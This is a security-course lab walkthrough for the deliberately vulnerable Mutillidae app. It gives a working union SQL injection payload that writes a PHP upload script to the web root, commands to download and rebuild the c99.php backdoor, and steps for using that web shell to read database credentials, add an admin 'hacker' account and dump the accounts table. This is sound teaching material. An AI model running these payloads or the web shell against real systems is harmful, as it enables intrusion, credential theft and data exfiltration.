ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page |Views: 27069

(Mutillidae: Lesson 11)

{ SQL Injection Union Exploit #4 (Create PHP Upload Script) }


Section 0. Background Information
  • What is Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.

  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

  • What is c99.php?
    • The c99.php utility is a type of web front-in backdoor/rootkit that allows for anybody to do the following: List files and directories; search files and directories with regular expresses; executing shell commands; brute forcing ftp passwords; establishing netcat sessions, database reconnaissance and modification, and much more.

  • How does a malicious person put c99.php get on a webserver?
    • As stated in the disclaimer below, this is a Computer Security teaching website and it is against the law to engage in malicious behavior.
    • Some websites that communicate to a backend database might have a problem dealing with single quotes (') and SQL comments (--). 
    • Some websites might even have an upload box that does not check for malicious content (perl, php, asp, vbs scripts).
    • This and previous labs show some of the SQL injections a website might be susceptible too.

  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
      • Note: Remote database access has been turned on to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5 R1
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
    3. Mutillidae: Lesson 8: SQL Injection Union Exploit #1
      • Note: This lab contains a detailed foundation surrounding the union exploit.

  • References
  • Lab Notes
    • In this lab we will do the following:
      1. Due to a purposeful bug in the user-info.php code, we will use a Union SQL Injection to create a PHP script that allows any user to UPLOAD files to the webserver in the Mutillidae application directory.
      2. We will upload c99.php to the Mutillidae application directory.
      3. We will obtain database credentials.
      4. We will create a hacker user in the accounts table.
      5. We will dump and save the accounts table.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight Fedora14 - Mutillidae
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

 

Section 2: Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine

     

  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

 

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

 

Section 4: Configure BackTrack Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  3. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

 

Section 5: Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 6: Open Console Terminal and Retrieve IP Address
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.109.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

 

Section 7: Download c99.php
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
    • Note(FYI):
      1. You can re-use your previous console terminal from (Section 6, Step 1).

     

  2. Get Rar File
    • Instructions:
      1. mkdir -p /root/backdoor
      2. cd /root/backdoor/
      3. wget http://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson11/stuff.rar
      4. ls -lrt

     

  3. Extract Rar File
    • Instructions:
      1. unrar x stuff.rar
      2. cat part1.txt part2.txt part3.txt > c99.php
      3. cp c99.php c99.php.bkp
      4. ls -lrt

     

  4. Configure and Prepare c99.php
    • Instructions:
      1. head -1 c99.php
        • Notice how the first line does NOT contain "<?php".
      2. sed -i '1 s/^.*$/<?php/g' c99.php
        • This only replaces the first line of file with "<?php".
      3. head -1 c99.php
        • Notice how the first line DOES contain "<?php".
      4. gzip c99.php
        • I compress c99.php, because DVWA does not allow you to upload files greater than 10000 bytes.
        • I use gzip instead of rar, because gzip pretty much comes standard on most flavors of linux.
      5. ls -l

 

Section 8: Database Union Explanation
  1. On Fedora 14 - Mutillidae
    • Notes (FYI):
      • Use your existing Terminal you opened in (Section 3, Step 1).
    • Instructions:
      1. su - root
      2. mysql -uroot -psamurai
      3. show databases;
      4. use nowasp;

     

  2. Show Tables
    • Instructions:
      1. show tables;
    • Notes (FYI):
      1. show tables, list all the tables in the particular DATABASE.

     

  3. Show Tables
    • Instructions:
      1. desc accounts;
    • Notes (FYI):
      1. desc accounts, show the accounts TABLE fields.
      2. The Mutillidae User Info Application uses this table.
      3. Notice it has 5 field.
      4. In order to complete a successful SQL union injection, it will need to include 5 fields.
      5. E.g., ' union select null,null,null,null,null' --

 

Section 9: Navigate to the User Info Page
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser

     

  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

     

  3. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

 

Section 10: Inject Upload Form into User Info Page
  1. Inspect the View Account Details Button with Firebug
    • Instructions:
      1. Right click on the View Accounts Details Button
      2. Click on Inspect Element

     

  2. Change Button Placement
    • Instructions:
      1. After the string style="text-align:, Change center to left. (See Picture)
      2. Click on the Close Button
    • Note(FYI):
      1. You are changing the button positioning, so you are still able to see the button, after you change the size of the Name Textbox in the following step.

     

  3. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element

     

  4. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 550. (See Picture)
      2. Click on the Close Button

     

  5. Backdoor Union SQL Union Injection
    • Instructions:
      1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select null,null,null,null,'<html><body><div><?php if(isset($_FILES["fupload"])) { $source = $_FILES["fupload"]["tmp_name"]; $target = $_FILES["fupload"]["name"]; move_uploaded_file($source,$target); system("chmod 770 $target"); $size = getImageSize($target); } ?></div><form enctype="multipart/form-data" action="<?php print $_SERVER["PHP_SELF"]?>" method="post"><p><input type="hidden" name="MAX_FILE_SIZE" value="500000"><input type="file" name="fupload"><br><input type="submit" name="upload!"><br></form></body></html>' INTO DUMPFILE '/var/www/html/mutillidae/upload_file.php' --
      2. Click the View Account Details button
    • Note(FYI):
      1. This above SQL union statement writes a small php script into the following location /var/www/mutillidae/execute_command.php.
      2. ' union select null,null,null,null,' - This is the start of SQL union injection statement, that includes the first four fields follow by the start of the fifth field (,').
      3. <html><body><div> - This is standard opening body to a HTML page. 
      4. <?php if(isset($_FILES["fupload"])) { $source = $_FILES["fupload"]["tmp_name"]; $target = $_FILES["fupload"]["name"]; move_uploaded_file($source,$target); system("chmod 770 $target"); $size = getImageSize($target); } ?> - This is the PHP script that allows a person to upload a 500,000 byte file (value="500000"). The browse button is represented as (<input type="file" name="fupload">). The submit button is represented as (<input type="submit" name="upload!">).
      5. ' INTO DUMPFILE ' - This tells MySQL to place the HTML Form / PHP Script into a file.
      6. /var/www/html/mutillidae/upload_file.php - This is the output file.

     

  6. Viewing the Results
    • Note(FYI):
      1. This is a typical error message saying either a bad user name or password was supplied.
      2. Typically, web designers should not display what caused an error.  Highlighted by the red rectangle, notice that now the upload form is embedded in the query results.

 

Section 11: Upload c99.php to Mutillidae
  1. Upload c99.php to Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/upload_file.php
      2. Click the Browse Button
      3. Navigate to /root/backdoor
      4. Click on c99.php
      5. Click the Open Button
      6. Click the Submit Query Button

 

Section 12: Using c99:php's to grab database password
  1. Server security information
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL with your Mutillidae's IP Address obtained from (Section 3, Step 3)
        • http://192.168.1.111/mutillidae/c99.php,
    • Instructions:
      1. Place the following URL in the address bar
        • http://192.168.1.111/mutillidae/c99.php
      2. Click on the Sec. link

     

  2. Discover Mutillidae Application Directory
    • Instructions:
      1. Place "pwd" in the upper-left command execute text box. (See Picture).
      2. Click Execute
    • Note(FYI):
      1. pwd - print name of current/working directory.

     

  3. Search php scripts for the string password
    • Notes (FYI):
      • Now we will search the 900+ php scripts for the string "password" and "=".
    • Instructions:
      1. Notice that /var/www/html/mutillidae is displayed in the results sections.  This is the Mutillidae Application directory.  In the following step, we will use find to search the /var/www/html/mutillidae directory to search for php scripts that contain a password.
      2. Place the following command in the second pane:
        • find /var/www/html/mutillidae -name "*.php" | xargs grep -i "password" | grep "="
      3. Click Execute button

     

  4. Viewing Password Results
    • Notes (FYI):
      1. Notice the password is "samurai".
      2. Notice that script that contains the samarai password is located as follows:
        •  /var/www/html/mutillidae/classes/MySQLHandler.php

     

  5. Viewing the Code
    • Notes (FYI):
      • It is possible to display the contents of the MySQLHandler.php program, by encoding the "<?php" and "?>" tags.  These tags tell apache to execute a php script.  To get around this problem and just display the text of the program, we change "<" to "&#60;" and ">" to "&#62;".
    • Instructions:
      1. Place the following command in the second pane:
        • find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'
      2. Click the Execute Button
      3. Database Username
        • static public $mMySQLDatabaseUsername = "root";
      4. Database Password
        • static public $mMySQLDatabasePassword = "samurai";
      5. Database Name
        • static public $mMySQLDatabaseName = "nowasp";

 

Section 13: Using c99:php's to examine pillage the database
  1. Connect to SQL
    • Instructions:
      1. Click the SQL navigation link.
      2. Username: root
      3. Password: samurai
      4. Database: nowasp
      5. Click the Connect Button

     

  2. Select the "accounts" table
    • Instructions:
      1. Click on accounts

     

  3. Insert Record Link
    • Instructions:
      1. Click the [ Insert ] Link

     

  4. Supply New User Information
    • Instructions:
      1. cid Value: 20
      2. username Value: hacker
      3. password Value: hacker
      4. mysignature: Your Name
        • Note: Replace the string "Your Name" with your actual name. 
        • E.g., John Gray
      5. is_admin: TRUE
      6. Click the Confirm Button

     

  5. Insert New User Information
    • Instructions:
      1. Click the Yes Button
    • Note(FYI):
      1. This is the SQL syntax to insert a new user into the "accounts" table.

     

  6. Verify New User Information
    • Note(FYI):
      1. Scroll Down (See Picture)
      2. Verify that your hacker account was created

     

  7. Prepare to Dump the Accounts Table
    • Instructions:
      1. Scroll Up (See Picture)
      2. Click the Dump Link

     

  8. Dump the Accounts Table
    • Instructions:
      1. DB: nowasp
      2. Only tables (explode ";"): accounts
      3. File: ./dump_nowasp_accounts.sql
        • Make sure there is only one "_" between dump and nowasp.
      4. Download Checkbox: Check it
      5. Save to file Checkbox: Check it
      6. Click the Dump Button
    • Note(FYI):
      1. You will be prompted to save the file, so please continue to next step for further directions.

     

  9. Save Accounts Dump File (Part 1)
    • Instructions:
      1. Click the Save File Radio Button
      2. Click the OK Button

     

  10. Save Accounts Dump File (Part 2)
    • Instructions:
      1. Name: dump_nowasp_accounts.sql
      2. Click the [+] in front of Browse for other folders
      3. Click the root folder
      4. Click the Save Button

 

Section 14: Proof of Lab
  1. Proof of Lab, (On a BackTrack Terminal)
    • Instructions:
      1. cd /root
      2. grep -i hacker dump_nowasp_accounts.sql
      3. date
      4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press both the <Ctrl> and <Alt> keys at the same time.
      2. Do a <PrtScn>
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth